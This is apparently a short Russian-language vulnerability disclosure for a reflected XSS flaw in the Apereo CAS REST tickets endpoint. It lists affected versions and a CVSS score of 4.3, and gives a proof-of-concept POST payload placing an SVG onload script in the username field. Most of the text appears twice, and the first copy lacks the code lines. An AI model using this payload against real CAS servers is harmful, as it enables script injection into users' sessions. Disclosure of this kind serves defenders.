Предпосылки:
Серия Apereo CAS v6.3.x соответствует предыдущей версии v6.3.7.1, а серия v6.4.x соответствует версии v6.4.2;
Apereo CAS запускает интерфейс Restful API (по умолчанию не включен)
Уровень опасности:
CVSS: 4.3
Затронутая версия:
Серия Apereo CAS v6.3.x до v6.3.7.1
версия v6.4.2
PoC:
Полезные данные, отправленные POST:
Путем проверки обнаруживается наличие отражающей уязвимости XSS.
Серия Apereo CAS v6.3.x соответствует предыдущей версии v6.3.7.1, а серия v6.4.x соответствует версии v6.4.2;
Apereo CAS запускает интерфейс Restful API (по умолчанию не включен)
Уровень опасности:
CVSS: 4.3
Затронутая версия:
Серия Apereo CAS v6.3.x до v6.3.7.1
версия v6.4.2
PoC:
Код:
http://127.0.0.1/cas/v1/tickets/Полезные данные, отправленные POST:
Код:
username=<svg/onload=alert(1)>&password=adminПутем проверки обнаруживается наличие отражающей уязвимости XSS.